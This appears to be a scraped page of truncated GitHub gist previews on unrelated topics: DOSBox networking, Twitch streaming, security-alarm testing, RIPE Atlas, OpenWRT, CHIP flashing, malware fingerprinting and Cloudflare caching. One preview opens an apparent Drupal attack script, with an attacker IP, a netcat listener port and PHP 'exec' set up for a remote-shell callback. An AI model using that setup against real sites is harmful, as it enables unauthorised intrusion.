This gist has moved to its own repository HERE
See you there!
#!/bin/bash | |
# | |
# Heavily Modified from: https://www.dosbox.com/wiki/PPP_configuration_on_linux_host | |
# | |
# Usage: | |
# sudo ./isp.sh | |
# | |
# This script makes it so you can browse the net with DOSBox and Trumpet Winsock in | |
# Windows 3.11 | |
# |
# AJ Caldwell - [email protected] | |
function codestream -d "Twitch streaming customized for coding (mostly reading documentation)." | |
# Input configuration. | |
set IN_VIDEO_ID "1" # The main screen we code from. | |
set IN_AUDIO_ID "0" # The Twitch-Input we set previously. | |
set SOURCE "$IN_VIDEO_ID:$IN_AUDIO_ID" # avfoundation assigns numbers to video/audio devices. | |
set INRES "1440x900" # input resolution for a macbook air | |
set IN_FPS "10" # Our rate of video capture. |
This gist has moved to its own repository HERE
See you there!
<# | |
The purpose of this script is to attempt to set off alarms on security products. | |
#> | |
function Get-RandomString { | |
# Get-RandomString.ps1 | |
# Written by Bill Stewart ([email protected]) | |
#requires -version 2 |
#!/usr/bin/env python | |
from ripe.atlas.cousteau import ( | |
AtlasResultsRequest | |
) | |
import bz2 | |
import json | |
import requests | |
import sys |
#!/bin/sh | |
YOUR_EXTERNAL_IP="172.16.30.108" | |
YOUR_NETCAT_PORT="6969" | |
# Start up a netcat server | |
# netcat -l 6969 | |
HOST="http://drupal.docker.localhost:8000" | |
PHP_FUNCTION="exec" |
# th0ma5w at github | |
# | |
# requires: | |
# http://archive.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/zlib_1.2.7-1_ar71xx.ipk | |
# http://archive.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/python-mini_2.7.3-1_ar71xx.ipk | |
# | |
# python ./tzumi_server.py | |
# | |
import socket |
Below are the steps required to flash a NextThingCo CHIP or PocketCHIP from the command line, as of November 2018. The web flasher no longer works, and there are numerous errors when flashing from the command line, mostly due to broken dependencies. The following method works for flashing a CHIP as of November 2018:
Note: Flashing must be done on Linux. Tested on Ubuntu and Rasparian. Mac OS seems to not work.
#!/bin/bash | |
########################################## | |
# | |
# Disass.sh (c) 2014 | |
# Leveraging other OS disassembly and AV tools to fingerprint potential malware | |
# | |
# License : | |
# http://www.gnu.org/licenses/agpl-3.0.txt | |
# | |
# Author: Andy @ Netscylla |
⚠️ Note 2023-01-21
Some things have changed since I originally wrote this in 2016. I have updated a few minor details, and the advice is still broadly the same, but there are some new Cloudflare features you can (and should) take advantage of. In particular, pay attention to Trevor Stevens' comment here from 22 January 2022, and Matt Stenson's useful caching advice. In addition, Backblaze, with whom Cloudflare are a Bandwidth Alliance partner, have published their own guide detailing how to use Cloudflare's Web Workers to cache content from B2 private buckets. That is worth reading,